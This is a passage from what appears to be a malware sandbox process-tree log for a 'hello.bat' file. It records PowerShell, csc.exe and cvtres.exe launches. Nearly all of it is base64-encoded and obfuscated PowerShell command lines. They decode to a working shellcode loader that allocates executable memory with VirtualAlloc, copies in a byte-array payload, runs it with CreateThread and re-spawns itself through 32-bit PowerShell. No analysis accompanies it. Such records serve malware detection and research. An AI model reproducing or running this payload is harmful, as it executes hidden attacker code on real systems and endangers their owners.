ACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:9028

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:5352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sm3f4hv0\sm3f4hv0.cmdline"
5⤵
PID:6664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6976.tmp" "c:\Users\Admin\AppData\Local\Temp\sm3f4hv0\CSC7D00727B6CD6430783AD25A95F11A48.TMP"
6⤵
PID:9108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
1⤵
PID:7852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeA